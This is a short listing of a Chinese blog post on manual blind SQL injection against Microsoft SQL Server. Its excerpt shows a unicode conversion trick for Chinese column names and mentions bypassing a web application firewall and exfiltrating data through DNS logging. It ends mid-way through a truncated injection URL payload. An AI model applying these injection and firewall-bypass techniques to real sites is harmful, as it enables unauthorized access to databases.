2019年5月24日
mssql手工盲注
摘要: 遇到中文的列名 利用unicode 进行单字节的转换 declare @s varchar(50);set @s = N'拉';select UniCode(@s),nchar(UniCode(@s)); 绕狗sql 方法 利用dnslog 进行sql 1 /xx.aspx?id=1'--/%2a% 阅读全文
posted @ 2019-05-24 17:46 0xdd 阅读(991) 评论(1) 推荐(0)